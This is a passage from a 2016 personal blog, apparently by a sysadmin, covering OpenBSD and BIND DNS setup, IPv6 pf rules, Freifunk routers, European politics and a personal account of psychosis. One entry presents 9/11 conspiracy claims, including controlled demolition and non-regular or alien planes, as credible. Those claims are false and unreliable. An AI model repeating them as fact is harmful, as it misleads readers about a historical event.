standard that's open, but the beauty of freifunk is that it's able to adapt
quickly to changes in protocols due to their use of Open Source Software.
Will we get there? Not sure, due to the chaotic nature of hotspots popping up
and disappearing again when new router equipment is installed.
Donated $5 to ISC
May 12th, 2016
I have donated 5 dollars (USD) to Internet Systems Consortium (I hope I got
that right), the makers of BIND software. I use BIND at work, and privately
(at least for another week or so). These guys deserve it.
Ordered books
May 15th, 2016
I have ordered the following books:
Construction of Attack-Resilient and Efficient Overlay Topologies for Large-Scale P2P-based IPTV Infrastructures - Mathias Fischer
P2P Networking and Applications - John Buford et al.
P2P-basierte Gruppenkommunication in drahtlosen Ad-hoc-Netzen - Peter Baumung
If you'd guess what would I do with these and other purchases of books? Perhaps
something with SIP and P2P perhaps?
5 days left for americas.centroid.eu
May 16th, 2016
Americas.centroid.eu I'M letting expire. It's my vps jail in panama. It
expires in 5 days. What I'm doing is I'm renting another vps in toronto from
digital ocean. It will be a DNS recursive server at first. Along with
io.solarscale.de I'm going to make them recursive with TSIG security so that
my home network uses them. Since I regularily download from a server at
151 Front in Toronto I know that I get about 1.1 MBit/s on that route. That's
enough for a DNS server, which uses a lot less. Only problem is that there
may be passive dns spies along the route. Hmm oh well, more money to the
north americans I guess.
Instead of Toronto, Ireland?
May 20th, 2016
I'm weighing the option of going with an Irish AWS instance instead of a
Toronto Digital Ocean instance. Difference is that I'll be able to run
OpenBSD on AWS. Tomorrow americas.centroid.eu will expire. Days later
the domain name swshell.de that is hosted on there will expire too. Then I'll
do clean-up of the authoritative domain names (removing glue records etc).
I'm still undecided on the Ireland thing, we'll see.
Turkeys government? No go!
May 21th, 2016
The german chancellor Angela Merkel should not have visited turkey after they
got rid of their democracy. What is turkeys secret plan? Inquiring minds
want to know.
Moved delphinusdnsd
May 26th, 2016
I have moved my in-production delphinusdnsd back as a hidden master. It will
only do AXFR's now to the slaves. What's replacing the authoritative end on
omega.virgostar.net is a BIND nameserver, which will also do recursion
eventually (with TSIG key).
In other DNS news my domain name swshell.de is still on the denic nameservers
and I don't know why it's not removed, the domain is expired.
Still other DNS news is that delphinusdnsd has a problem with the database.
It goes into an infinite loop under some condition while querying the database.
I did a tcpdump at the same time and it doesn't appear to be outside traffic
causing this. I'll be stripping the berkeley db eventually I suspect and
replacing it with something homegrown.
Gotthard Base Tunnel
June 4th, 2016
This link(german) talks a little about the Gotthard
Base Tunnel. I guess Switzerland is not in the EU but they have positioned
themselves to transit goods via this tunnel between Italy and the rest of
the EU. This is a great deal for them and I'm a little jealous they can take
all the glory. Surely there must be benefits for us, ie. cleaner air from
the Alps because Lorry drivers should take a train now. That remains to be
smelled and tasted. I don't think I'll notice a diff. However a lot of
Europeans quality of life may get better minutely due to this tunnel.
Another great tunnel would be the Finland-Estonia tunnel if it ever makes
the drawing board and political acceptance.
Brexit, I'd like UK to stay
June 4th, 2016
There is really not much to talk about here other than the worry that we're
all gonna lose out if the UK splits. What would happen to the UK if they
decided to take their own path? What would happen to us?
Realistically seen the UK fits to Europe like jeans to a human. What would
they do without the benefit of having a large continental body right next to
them? I guess there is Canada and Australia and New Zealand. But those are
far away. Ie. if the commonwealth gets put into a political union more than
it already is... would that work? And would the commonwealth be willing to
enter a loose-knit union strewn all over the globe?
I think for those people in the UK that want to see change, they should strive
for that change within the EU. It might be beneficial for all of us.
Won't you stay, (a little bit longer)?
OpenBSD Donation Time
June 4th, 2016
I have donated 100 EUR to Theo de Raadt. Part 1/2 this year.
Why I prefer BIND over unbound currently
June 10th, 2016
I have set up a BIND nameserver on my gateway at home. I also have set up
BIND nameservers on io.solarscale.de and omega.virgostar.net. The three
talk to each other with the use of secret keys (TSIG queries). AFAIK
unbound cannot do this as I googled once and saw a question by Jan-Piet
Mens (an author of DNS books) ask about that feature on unbound and the
reply was negative. So it will have to be BIND, even though they are
about to change their license to a Mozilla license as compared to a BSD
license. That announcement was made at RIPE 72 in Copenhagen. OpenBSD
which was represented by Peter Hessler said they were against that, and
it brings back memories of the ipf/pf spat. However OpenBSD decided to
go with unbound/nsd a few years back already so there is likely no change.
Energiewende in Danger
June 10th, 2016
Germany's transition to green energy is in danger from shifting policies in
government. One argument is that they think that we're overproducing
electricity, so I have an idea. We could create hydrogen with excess
electricity and sell it to Iceland via ships. The ships sail back via Norway
(empty) and fill up with natural gas and then return to Germany. It's a sort
of triangle trade (without slaves), but with substances that require high
pressure. Also we could use hydrogen locally until there is no more need
to export it to Iceland. Think about it! Makes perfect sense.
This article
talks about light pollution. Light pollution affects 80% of global population.
I've never completely seen the milky way. But I have vivid memories of seeing
a lot of stars in northern Ontario, or even in northern Saskatchewan.
Received seven Freifunk Routers
June 18th, 2016
Here is a (bad) photo of two of them:
I'm going to be using 6 of these for networking my neighbourhood.
Not going to say much more than that because I'm dealing with the
details but it's likely to go down mid August.
June Solstice in 3 days
June 20th, 2016
On thursday is solstice.
Happy festivities honoring your summer or winter gods (depending where you are
on earth). In the northern hemisphere the sun will shine directly down at a
90 degree angle at the tropic of cancer. There is probably a story of
Ptolemy (sp) who discovered that the sun shone straight down a well or cave
in ancient Egypt.
Happy Summer!
June 21st, 2016
Since I screwed up last post (solstice was yesterday) I want to wish you a
happy turn of the seasons. It's summer here in Germany. Happy summer!
Good bye Britannia
June 24th, 2016
The UK voted leave yesterday. Congrats for a large voter turnout. The
pound dropped to a 30 year low against the dollar, and that isn't all.
The UK is not part of the big three anymore and not part of the big four.
There will be unneeded hardships for everyone and if the UK wants to come
back into the EU there will be such a leashing back that it won't be worth
it for them. That's my outlook on this. I guess we pick up the pieces
from here. The new big three in the EU is Italy, France and Germany. The
fourth country in the EU to be part of the big four is Spain. I'm sad but
relieved a decision has fallen. Now we'll close the border to english
soccer fans too hopefully. What has gone down in France is a shame regarding
the violence of soccer fans.
Idea Brainstorming for Britain
June 24th, 2016
So after brexit, what can britain do? I kinda feel sorry for them, so I'm
gonna talk about some ideas. There is the commonwealth. With Canada and
Australia there is potential for 120 million people being united globally.
There is ideas of hyperloops going from Canada to Scotland, there is movies
that have a tunnel go past the center of the earth to create a link between
England and Australia. Also scram-jet technology is talked about and tested
in Australia..
Also you don't have to look all that far, Norway is quite interested in what's
happening. With Britain, Norway and Iceland a triangle Atlantic union could
form. In times of ocean mining ideas perhaps there is stuff one can take out
of the ocean bed inside the triangle.
I do feel however that Britain has lost backing and a voice in the world. It
is now a small island nation and needs to look around a world that is
continually uniting to grasp market share and quality of life.
EU, something must change!
June 25th, 2016
The EU has to draw consequences from brexit. Something must change. Let the
british leave not be in vain, their sacrifice should better us all. Let's
work for the people for example and less for political bureaucracy. I always
thought that the EU for a first attempt at managing a large union and doing so
democratically was doing fairly good, but we can do better. We also must
become friendlier with southern EU states. Less exploitation, more
subsidizations. We're all humans first and foremost, and EU citizens should
experience a similar quality of life no matter where in the union they may
be. We must strive for this. I know some think that this will be hard on
their wallet. But think about the lost opportunities when more countries
leave. That'll work contra to the progress we've all been making together.
I hunt sysadmins
June 25th, 2016
The Five-Eyes nation's spy agencies have no more obligation to protect EU
citizens. They can now hunt sysadmins inside the EU with impunity due to
UK leaving EU. All those sysadmins operating in the EU should be aware
that this could result in sabotage or 0wnage. But don't get hysteric or
anything. Snowden told us this is happening, and we find ourselves on the
other side suddenly.
Ordered books from Amazon
June 26th, 2016
I have ordered a set of 4 books from Amazon. Donald Knuth's Art of Computer
Programming volumes 1-4. I count this as one book though in my list of a
dozen books per year. I'm happy to be receiving these by thursday.
Changes at $HOME
June 29th, 2016
I'm doing changes to my home computers due to a startling discovery. I
believe my Macbook Pro is hacked or so. So I'm going to put OpenBSD on it
in due time. It's sort of a brexit of my own doing, avoiding Mac OS X and
the vmware'ed Windows 10 on the MBP. I don't need these totalitarian OS's
and I won't ever go on to Mac OS Sierra. I never liked the Apple announcement.
It is too privacy inhibiting. So I'm going to OpenBSD. It's open source,
I can look under the hood, and it's supposedly secure and functional. Most
my network gear is OpenBSD so I don't mind this decision at all. Fallout?
Yes there is fallout. I have a Numark DJ mixer that worked with DJ Pro
software on the Macbook Pro that I won't have a replacement for on OpenBSD.
Since I'm a monkey with mostly everything I don't think an openbsd driver and
software for the mixer will get written, if ever. So I needed the windows 10
on the MBP until today as I have installed Ubuntu on a netbook of mine (the
second Acer) and it does all the features I need with Java, luckily. Plus
I only need it once a month or so for work. Anyhow before I become too
incoherent I'm gonna keep this short. Just want to let you know!
The missing link
July 2nd, 2016
In the region I live there is job ads. People want to hire. Yet there is
no people that can fill those positions. I have been working in IT since
I was 21, so 19 years ago was when I started working. Back then I came from
a short stint at college where I did not graduate, but I did manage to gather
up a few college credits. Here are a few other people who did not graduate
from post-secondary education:
Steve Jobs - Apple
Sir Richard Branson - Virgin Atlantic
Larry Ellison - Oracle
So it can be said that these people beat the odds of getting somewhere after
not completing university. I have always thought that I'm capable of similar.
When I started work after college, I started investing in books, of technical
nature and to this day I follow a budget of around twelve books a year in
order to shape up and make up for knowledge that I did not have the time or
patience to learn. These books are often pretty good, but sometimes they are
disappointing as well. Where I live we have no technical bookstores so I'm
forced to take a chance with buying from online retailers. So how does this
all fit together? Job ads? Work experience? Famous people? What I'm trying
to say is that the positions of work advertised do not reflect my skills which
are highly specialized in the UNIX field. There is a missing link.
I have
the power to write tools, or use tools from other people, to apply these on
problems that are imposed on other people. However when someone wants a
Windows admin I'm helpless. I did take a course in windows once but as time
progressed and I focused on UNIX I lost that knowledge. It's how they say
"use it or lose it". So what I'm saying is the people who post these job
ads should make inroads to allow other tools to help with their problems.
Simply put "I'm looking for a windows admin that knows AD" sounds a lot like
"As an investor I've bought into Microsofts promise to make me money and I
want a serf to fulfill that dream for me". Well I'm no serf. And some of
these job ads I've seen on the market for quite some time, they aren't getting
filled. It's almost as if these people have no direction and just look up any
formula found somewhere in Redmond, Washington that promises to give them
money. It's a dead end. That's the missing link.
Opportunity is created
when people do inroads. When they hoist others on their shoulders not when
they have some formula for making money and want a robot/serf to do the work
as outlined. Creativity feeds opportunity. As much as you want to surround
yourself with scientists you're missing the big picture unless you also stick
an artist in the midst. The artist plays with unknown things that intrigue
the scientists and gives them passion to aim higher. In much the same way
I am an artist working with computers, inhibit my creativity with my tools
nothing will progress and it's a terrible waste. I also do research. I
write on a DNS server. Who can say that about themselves? In this region?
I scoff at those people who scoff at that. The research, the artistic
expression of interpreting an RFC, is what should drive an IT person forward.
What out of ideas? Write an SMTP server, write any server you have a problem
with in order to figure it out and better yourself and better humanity. I am
totally prepared to fill the missing link and do a good job of it.
Being Freifunk Active
July 4th, 2016
This morning I distributed 47 letters to neighbours making them aware of
freifunk.net and offering them a deal on how they can get freifunk routers
from me for free. I'm hoping the response will be positive and we'll be
able to mesh-network the entire apartment complex. So far I have invested
165 EUR in this and there will be a bit more to pay for my neighbours.
I'm having a lot of fun with the planning of this so far.
EU could be un-democratic
July 5th, 2016
There is all sorts of political slyness going around continental Europe.
There is talk of "not letting britain leave". To me that's a wrong move
as the british have voted "leave" and that should be respected. Let's
not make a farce of democracy here! Because it will rattle our cage,
and perhaps more than that. It's funny how some people think they can
outdo the numbers of a referendum, for personal gain.
It's not me
July 13th, 2016
The recommendations of youtube to me are not me. Whether illuminati, flat
earth, greys, aliens, crop circles, future, past, reggae, hip hop, tupac,
sports illustrated cover girls, tagesschau news, conspiracy theories, you
name it, it isn't me. I don't even know why I watch this trash, as there
is little quality found on youtube. There is no relationship between
ancient egypt and the pyramid on the dollar bill. Should there be? Please!
Get real! Perhaps you never heard of american pyramids? OK time to educate
yourself. Look for maya pyramids. And I believe that's just the tip of the
pyramid of pyramids that existed on earth. Relationship between pyramids and
stars? It's possible, I don't know. This is a message to possible AI's
interested what is really me. Not my google profile that's for sure.
Ordered two books
July 15th, 2016
I have ordered two books.
IPv6 Socket API Extensions: Programmer's Guide - Li, Qing
IPv6 Essentials - Hagen, Silvia
I have read some of Qing Li's books before I'm looking forward to this one.
Silvia Hagen's book is new to me, hopefully not a disappointment.
My Stargate
July 18th, 2016
I had a vision tonight how I can "weave" a stargate. It requires two pairs
of 3 rings where there is entangled atom pairs. The idea bases on a few
theoretical / non-proven assumptions. A pair of entangled atoms cannot be
"crossed" by another pair of entangled atoms. That's hope #1. And entangled
atoms can be safely stored in spacetime in some medium while entangled. That's
hope #2.
As you can see in the video it waves/knits 1 mesh which lies on top of a set
of 15 (or more/less) entangled atoms. When the fabric is tight enough a
wormhole will form. Pretend the rings are like ball bearings there can be a
door in the middle disallowing vacuum to enter, or atmosphere to exit. Other
wise it would be like pulling the plug of a bathtub, your atmosphere would
be teleported to space and be gone.
My personal use of this device is to build a space station with a microsat.
The microsat has the remote end and positions itself in a lagrange point.
Then you create the wormhole/tunnel and feed it more objects such as more
robots that build from their own material (perhaps steel) a torus/wheeled
space station. Once that's done bigger tunnels can be made and eventually
it would have to be so big to fit me through it. Then I'd be leaving you
all to live on my torus at L5.
Sick of it
July 19th, 2016
A wave of terror is sweeping the area. Yes. I've been indoctrined to it.
And I can't stand it. What I hate the most is respectable newspapers that
I had respect for, literally feeding the flames. They posted a picture of
a terrorist with a knife, to twitter. To bad that terrorist was shot dead by
police this morning. So what's the point of showing us his ugly face?
It's over! Nothing to see here!
The WTC conspiracy
July 22nd, 2016
Where was I when the WTC airplane bombings happened? I was at home, in my
apartment in Toronto, sleeping in. I also didn't have a TV (thank goodness)
so I wasn't able to play CNN or other news outlets to the full media coverage
as others. So as time progressed away from point zero, I became more and more
interested in the conspiracy theories. In the meantime I got a TV again.
At first I wasn't able to see through it but the more I watched the more there
were questions, such as:
Why did WTC building 7 implode?
Why did the falling of the WTC towers look like a controlled implosion?
Why was there a lot of cabling being laid in the WTC before September 11th?
Why did the wingtips of the airplanes slice the side of the WTC towers
like butter? Without breaking off... aluminium vs. steel you take your pick.
Eye witnesses said it was a dark plane not like described by the media
At what speed did the planes hit the towers? Because top speed is only
achieved at 36,000 feet
There is other factors that I'M not listing because I can't remember them in
detail but they were all good. If you want to see them read up on 9/11
debunks on youtube.
So my conclusion to this is either a) a conspiracy, or b) an outer space alien
conspiracy. Now b seems likelier than a because people naturally talk. When
you look back 15 years so much has happened because of this event there is no
turning back the clock. So we gotta live with that. However I can say with
a clear conscience that I do not believe that were regular planes that flew
into the WTC towers on September 11, 2001.
Quitting Twitter tomorrow at noon
July 22nd, 2016
I'm not content with this social network. It robs my time. So I'm leaving it
I have said my formal goodbyes to the few people that I know on there. So
this is the second social network I'll be leaving after facebook. I don't
see how people like these so much. I'll still however be posting to this
blog. I have more control on this blog over what people see and archive.
If I was discontent with that I'd be closing the blog too, but i'm not.
Media blackout of SZ.de yesterday
July 23th, 2016
During the terrorist attack of Munich the munich newspaper sueddeutsche.de did
not work for up to 2 hours. I don't know if they were ddos'ed, couldn't
handle the load of so many people looking for information, or were told by
anti-terror police to stay offline. We'll never know. Today I'm leaving
twitter, I think I'm gonna wrap this up earlier than noon. Good riddance.
Finally quit Twitter
July 23rd, 2016
Well I've done it. I clicked deactivate my account. 8 months of time wastage.
While I was there I also cleared my cookie history and browsing history from
the beginnning of time. This was actually all under "browsing history" in
chrome.
Did you know: DoS report law
July 24th, 2016
When you're an ISP or similar network in Germany that is under DoS,
there is a law that you must report it to the government?
No shitting you! Meldepflicht.
So if you're a source of dos yourself and you get dosed you can't vigilante
back really.
Freifunk Project fail
July 30th, 2016
I had a project to give 6 routers to my neighbours. I sent them a letter asking
them whether they would like to do this, and I'd do a lottery which neighbour
in which house would get a router. All in all I intended to invest 220 euros
per neighbour that gets a router, but it didn't work. They must have thought
it was a scam. In the picture you see the red dots, that's where my project
would have been, but now I have 6 spare routers for freifunk franken that I
want to get rid of/sell. I guess mesh networks don't interest people that
aren't exactly technology freaks. It's a bit too bad.
If I were to vote in the US Election today
August 2nd, 2016
I'd vote Jill Stein of
the US Green Party. Perhaps lesser known than the GOP candidates, but the
Green Party has been around a long time (if Ralph Nader tells you anything).
However there is always accusations by the GOPs that parties like the Greens
take away the winning vote, I wouldn't let that deter me. I'd vote who I
want to vote for not to vote someone else out. Democracy is about pro choice
not anti choice. At least it should be so.
Ordered 4 books
August 5th, 2016
I ordered 4 books, something different from computer (programming).
Fundamental Astronomy - Hannu Karttunen et al.
Physics Book - Clifford Pickover
The Math Book - Clifford Pickover
Star Names: Their Lore and Meaning - Richard Allan
I hope these books will give me a bit of peace of mind, a distraction from
the otherwise computer life that is starting to bore me (a little). I picked
the math book for it's pictures in the preview on Amazon. I hope it's worth
it. Physics book interests me too, and Astronomy has always been on the
horizon of interesting things for me.
O Really? Do we really need NATO?
August 5th, 2016
I'm gonna keep it short. A Turkey that's a dictatorship within NATO doesn't
fit. A Britain "defending" the EU doesn't work. The continued mission in
Afghanistan serves only the Afghani security situation, o really? What we
need is a military alliance within the EU and only the EU. Some politicians
have already made that call. But keep NATO as the non-EU countries (America,
Canada, Britain, Norway), do with Turkey what you wish, it wouldn't be part
of the EU anymore.
DSL: A question I've always wondered
August 5th, 2016
I've always wondered what takes more electricity, a DSL modem or a Fibre Optic
Transceiver. If a DSL modem or even VDSL takes up a lot of electricity then
it's a waste, and should be replaced with fibre optic transceivers.
Psychosis: put to the test (my first psychosis)
August 5th, 2016
When I had my psychosis in Ottawa and Toronto, I didn't have too many
opportunities to hurt others.
Even though I hated everyone around me, I was curious to find the source of my
delusions. I rode my bike a lot to find the source which would have looked
like a bunch of vampires and behaved like succubi. As my psychosis continued
over time the worst shape I became. I started throwing pennies at limosines
as they were driving past me in Toronto. It was a good thing that I did not
have access (opportunity) to a firearm. Would I have used it? I don't know.
Psychosis puts you to the test on what person you are.
When that guy at the
hostel knocked on my forehead and said "this is what you're doing to me" and
implying that I was somehow knocking on his forehead with my thoughts which I
believe I was trying to do, I realised that this guy was out to screw me over.
He meddled with my mentally weakened and delusional state. And I hated him.
Had I a gun I might have shot him down. Instead I went out with my bike and
tried to forget the incident.
I'm glad that's the way I reacted because I am
not a violent person. I did see a few weird things. Like the chinese american
lady at the hostel who must have shown a blue led into her eye because her
left eye was lit blue. She tried to screw with my mind too. She asked me
several times, "what do you know?". I drew blank. Later I went with her for
a walk around Ottawa's parliament she said I was very stressed but did not
say I should get help. Perhaps she was afraid. I think I might have rode my
bike into the backyard of 24 Sussex Drive but it was open (the gates). And
somehow I ended up on the Ottawa River anyhow so I think it was just a parkette.
What else was weird. Oh yes as I was biking around a car stopped at a traffic
light and the driver opened the door and dropped something. A piece of paper.
After the car left (there wasn't many cars on the road) I went to pick up that
paper and it had a number of 5 or 6 digits on it. I drew blank again. I was
sure that it was a psychological trap to see if I'd pick it up. Someone else
was watching. But who? Anyhow I managed to do most things by myself but it
was increasingly difficult. The horror that something was terribly wrong with
me was causing tension inside me, I tried to relax. I started drawing on paper
with crayons and I did this at the airport when I left Canada that time. Being
able to leave the situation, the weird people, my delusions, my fears. I tried
to imagine that Canada was infested by vampires (part of my psychosis) and that
Europe was full of wolves based on a British guys wolf tattoo that I saw at the
hostel in Toronto.
Somehow being away gave me comfort but I was still
delusional. I was home, but in a strange land (hadn't been a resident of
Germany for 15 years prior), and I agreed to psychiatric counselling and
treatment after some time. I don't know why I needed to write this now but
it's for all those that have a psychosis and those who don't become violent as
me. Luckily I had an escape like I was told, but escapes are only needed when
your situation has no more routes to go. It should be noted I visited Canada
after that twice, and I don't think it's infested by vampires anymore luckily.
This is also for Glen Race, who I just read about in the Toronto Star.
New self-portrait of me
August 9th, 2016
This is me in 2016. A bit fatter than the previous years, a bit smarter
perhaps too. Although I heard that fat people have brains of skinny people
10 years older than them. So I'm not really smart.. but wise.
I just made this photo actually and touched it up with several tools, cut by
gimp.
less surveilance
August 15th, 2016
I have lessened the surveilance on my blog by disabling a javascript pinger.
This leaves the javascript ads that I have and I'm working on disabling those
too. Basically my goal is to make it so that people can read my webpage once
and have the page idly sit in their browser without it doing any traffic in
the background (which reveals to me and any third party that the browser is
still on my site).
My all-prime angled triangles
August 16th, 2016
I thought about this tonight and figured it out with the help of a small
shell script. There is only 6 possible of this kind of triangle in the
universe. I have listed them in a picture below.
They look like shards. And are different sizes, the ratio of sizes I didn't
mind because I got the images from an online triangle calculator.
The Panic Chronicles
August 19th, 2016
I have started the "panic chronicles" a blog-like bug report on what can go
wrong on OpenBSD. As I find bugs I'm sure to write them here.
Eleven Reasons to be excited about the future of Technology
August 19th, 2016
Slashdot wrote this. I'd like to
add my own opinion whether I'm excited or not.
Self-Driving Cars - worry me. A car is a weapon when misused.
Clean Energy - we're not there yet and will we ever be?
Virtual and Augmented Reality - used to excite me, but the devices are
locked down to only work on proprietary systems. Who wants to go pokemon go
hunting anyhow? Do we really need this in our lives?
Drones and flying cars - hmm. cool. When I still lived in .ca this would
be cool to make the "suburbs" 700 km northwards, here in .eu it doesn't really
matter since everything is settled land.
Artificial Intelligence - would be cool to have it answer my VOIP phone and
weed out voip spammers. Could it weed out my e-mail spam?
Pocket Supercomputers for Everyone - with choice of OS or programability?
Cryptocurrencies and Blockchains - I don't even know what that is
High-Quality Online Education - This is cool, however "da man" knows what
you're currently being taught. Playing hooky?
Better food through science - if it's tastier why not?
Computerized Medicine - if I swallow a "smart" pill that releases its dosis
at the right moment that could be beneficial. Similarily nano-robots could be
inserted into the blood stream, if that's possible I want virtual reality to
watch it go..
A new space age - yeah yeah.. where are our torus space stations that were
in stanley kubrick's 2001 A Space Odyssey? Missions to Jupiter? HAL 9000's? oh we actually got the HAL, it's called Watson
Think I'm a bit pessimistic today.
Delphinusdnsd: Next week selfathon
August 22nd, 2016
I'm going on holiday for a week next week. I'm going to solely program on
delphinusdnsd to get it in a state where I would be in a better position with
it. On the menu is dd-convert.c to replace the ruby script. If I get time
beyond that I'll work on making the dns keys rolloverable. Oh well good luck
to myself.
Ordered a Banana Pi R1 Routerboard + Case
August 22nd, 2016
I ordered this at roughly 100 EUR. The powersupply says it can deliver 2 Amps
at 5V meaning 10 watts. If this is true and if OpenBSD runs on this I'm going
to replace my i386 firewall that currently sucks 20 watts. I'll just have to
try it out I guess. If I don't get OpenBSD on it there is probably a chance
to run another UBO on it, or I could donate it to a developer. Will have to
see.
OpenBSD 6.0 Poster arrived
August 24th, 2016
I have hung up this poster where the 5.8 poster was. I notice it's somewhat crooked.
This puts my office into a darker hue. Which suits the onclosing winter season.
The whereabouts of HD164595 in Hercules
August 30th, 2016
Slashdot made me aware of this story of a SETI signal
that was observed, last year by a russian SETI installation.
I have plotted the rough area of HD164595 it's somewhere in the circle but
what's important is the relative near-ness to the star Vega. It's in the
constellation Hercules, and should be visible this summer with Telescopes.
As far as aliens reacting to broadcasts from Earth they have just now recieved
signals from 1920's because they are 95 light years away. However they might
have been reacting to carbon in our atmosphere due to the start of the
industrial revolution in the 1800's. Meaning the aliens have telescopes. It
is hypothesized that they are a Kardashev scale I civilization if they are
directing this towards only us, so they are more advanced than us.
May they keep the signal going with the strength of Hercules :-).
I had photographed Vega and Constellation Hercules
August 30th, 2016
This picture is from June 27th, 2010 so a little over 6 years ago. My dad and
I were on the Peterstirn which is outside of Schweinfurt (the city that I live
in). This article is in relevance to the last article and I wanted to show
it again. I have made a cut-off from the original RAW
Photo and I want to show you this. Feel free to open the photo in another tab to
make it it's original size.
As you can see this area of the sky (at least in june) is visible. You just
gotta know what to look for. If you can find Vega you can find constellation
Lyra and from there the area that's circled which is part of Hercules. Inside
the circle somewhere lies the star system that emanates an 11 GHz signal.
Update. I have added the label to a star I think is called Ras Alhague in the
constellation Ophiuchus. Constellation Hercules goes further up from here but
I don't have that in my photo.
One more panic chronicle entry
September 9th, 2016
I woke up today to a panic'ed router/gateway. What a way to start the day.
backtrace here.
Why am I not sending these to OpenBSD anymore? dunno. I remembered there
was a reason once.
TLS for centroid.eu blog, when?
September 14th, 2016
I'm going to restructure the website and the blog probably after the OpenBSD
6.1 release. Apparently there is a program in that release that manages
certificates from "let's encrypt". Since I'd want my whole website encrypted
I'd have to use let's encrypt several times to fully encrypt my website which
contains the domains virgostar.net, solarscale.de and centroid.eu. So if
you think the obfuscation is good enough, don't let it fool you, it was made
for a defense against bots (that don't know javascript) not to thwart spying
eyes. I'd run the same blog software only inside TLS with let's encrypt.
Props have to be given to Edward Snowden for his whistleblowing which caused
organizations like "let's encrypt" to form in the first place. Encryption
should be free!
Stand up for Snowden
September 14th, 2016
There is a website called "pardon Snowden". It asks you to sign a petition to US President Barack Obama to pardon
Edward Snowden before he leaves office. At the time of this writing Obama
still has 128 days in office. Think about what Snowdens chances are after
Obama? Would Trump pardon him? Would Hillary Clinton? Would anyone else?
Edward Snowdens whistleblowing which caused him to flee the USA and take up
asylum in Russia, caused US citizen no harm and did them a favour in showing
how out of hand the surveillance programme in the USA has become. Stand up
for your rights by signing the petition! I tried but realised it has to be
a US citizen. What sort of a world are we living in anyhow?
Equinox in two days
September 20th, 2016
Equinox is upon us again
in two days.
last year's equinox was on the 23rd of september and it was chilly in the
morning at 10 Celsius. Right now as I write this it's 16 Celsius and I'm
hoping I can keep the heat off another week. We'll see.
Ordered a book from Amazon
September 20th, 2016
This time I want to learn more about USB. So I got:
USB Complete: The Developer's Guide (Complete Guides) - Jan Axelson
Hopefully it was worth it.
My IPv6 setup at M-net (german provider)
September 27th, 2016
I recently added IPv6 functionality to my network and had some obstacles to
overcome, such as:
How to route deep into my network and assign each host an IP6 that is 2
hops deep.
What to do about rfc1918 IP's, since I want a NAT64/DNS64 setup
How to do NAT66 in order to use deep routes
Well to give you a better idea I'm going to show you my network plan:
I use a vether0 dummy ethernet interface to take on the IPv6 address from
my provider (mnet) so that I can give all other interfaces a 2001:db8::/56
address. This address gets translated later in my pf rules and the relevant
lines to the pf look like this:
table persist
table const { 2001:db8::/56 }
...
match out on $ext_if inet from to any nat-to ($ext_if)
match out on $ext_if inet6 from to any nat-to round-robin \
sticky-address
...
pass in on re2 inet6 from any to 64:ff9b::/96 af-to inet from ($ext_if)
pass in on re1 inet6 from any to 64:ff9b::/96 af-to inet from ($ext_if)
I would have liked putting (vether0:network) in place of the but found
that it translated to the fe80:: address and not the assigned address from
m-net. So I have to do it this way, it's no headache. Also the round-robin
was unfortuantely the only mode I got working, I would have liked to use
random to get a random IP6 on the outgoing /64.
So let's see what we got, we have native IPv4 NAT44'ed, we have dual-stack IPv6
NAT66'ed and we have NAT64/DNS64 on top of that. It's really cool, to show
you how the DNS64 works I'm gonna do a host lookup on censored.net which isn't
mine so please look at it just as an example:
beta$ host censored.net
censored.net has address 72.52.4.91
censored.net has IPv6 address 64:ff9b::4834:45b
censored.net mail is handled by 0 localhost.
Then when I route into 64:ff9b::/96 it gets af-to'ed in the pf rules to an
IPv4 address. It's really cool.
What else is missing? I want to show you the DNS setup with BIND from the
OpenBSD 6.0 ports, it worked out of the box. Here is what I had to add into
the options:
That's really all there is to it, I had a lot of fun doing this and can't
wait until some services of mine use IPv6 so that I can drop the native IPv4
completely.
Victim of spoofed Mail
September 30th, 2016
I've become victim of spoofed mail. Someone is sending mail with one of my
domains to other people, getting them mad, and I receive the bounces.
I do have SPF protection records but if the remote SMTP gateways don't enforce
SPF records, then it's not helping. Here is the IP's that a "valid" mail from
my domains would come from:
This is listed in SPF DNS records for my domains as well. I knew there was
a-holes on the Internet, and they finally got to me. Unfortunately there is
nothing I can do about this. If there is let me know what. I'm looking for
a technical solution.
FreeBSD Donation
September 30th, 2016
I have donated $5 to FreeBSD Foundation. This wraps up FreeBSD donations
for this year, there is an OpenBSD donation coming in 2 months or so.
I've turned on the heat for 2016/2017
October 4th, 2016
The temperature right now is 13 Celsius and it's expected to drop more, so I'm
turning on the heat. I read somewhere that in Germany by law the O-O rule
stands. O-O stands for Oktober-Ostern so october til easter that is when
the heat is expected to be turned on by landlords. Since I control my own
heat I am independent of this, but I pay for my own heat as well.
I got credited to a bug report
October 4th, 2016
OpenBSD fixed a bug in OpenBSD-current and it also existed in 5.9 and 6.0.
Here is the
credit, and it got fixed today. This is under the "ARP bug" in my panic
chronicles. Which I'll remove now.
Good News
October 6th, 2016
I have fixed a thing that stalled development on my DNS server. In particular
the dd-convert.c program was using mktime() erroneously, the fix was to put
timegm() in those places. Here is the fix at version 1.19 where
this occurred. Much thanks to Habbie who helped me in August of this year
to get me back on track. I can now continue programming on dd-convert.c when
I have time. I'm looking forward to my winter vacation. Perhaps I'll even
finish dd-convert.c then. And New Year 2017 would be around the time to cut
a release. Wouldn't it be great to be on time. Oh well.
Usutu Virus killing Blackbirds
October 8th, 2016
I heard the Usutu Virus
is responsible for killing large populations of blackbirds predominantly. I
wrote about
this in October 2011, seems there is a second large wave coming through
now. First read about this in
Spiegel Online (german). The blackbirds
are victims this year of not only this virus but trees have lesser food such as
berries I noticed, due to the summer heat.
My core network
October 11th, 2016
I was asked by AVM support to make a drawing of my network, I was having so
much fun with xfig that I want to share it with you.
Parts of it is in the german language but it's self explanatory.
Upgraded io.solarscale.de to OpenBSD 6.0
October 13th, 2016
I have upgraded my last FreeBSD VPS to OpenBSD. It wasn't easy but I managed
to overwrite the first 64 MB of the partition table with OpenBSD installer.
Then I did a network install. Which didn't work for some reason, so I had
to ftp the packages manually before doing a disk install. OpenBSD rocks!
I now have 3 OpenBSD vps's. I don't think I need any more, I'm quite happy
with this.
Ordered 4 Puffy Mugs
October 13th, 2016
I have ordered four puffy mugs from the OpenBSDStore. I'm glad to be inviting
my 3 friends to have tea or coffee with them. Puffy style.
An idea and a plea for our worlds society
October 16th, 2016
Currently we're living in a split-brained world. On one side there is
powerful corporations who build shabby products, on the other side there
is consumers who require quality products that have no government issued
backdoors in them.
If we really are in an "information" age then why are computers a secret?
Why do our children not get taught anything useful in school, to build
their own computer for example. We're teaching the kids nonsense and
not telling them the truth on what is needed in a true information age!
Now if you think children at age 12 should sit down with a soldering iron
and construct circuits you're both right and wrong at the same time. We
know that electric circuits can produce a logic gate in order to do the
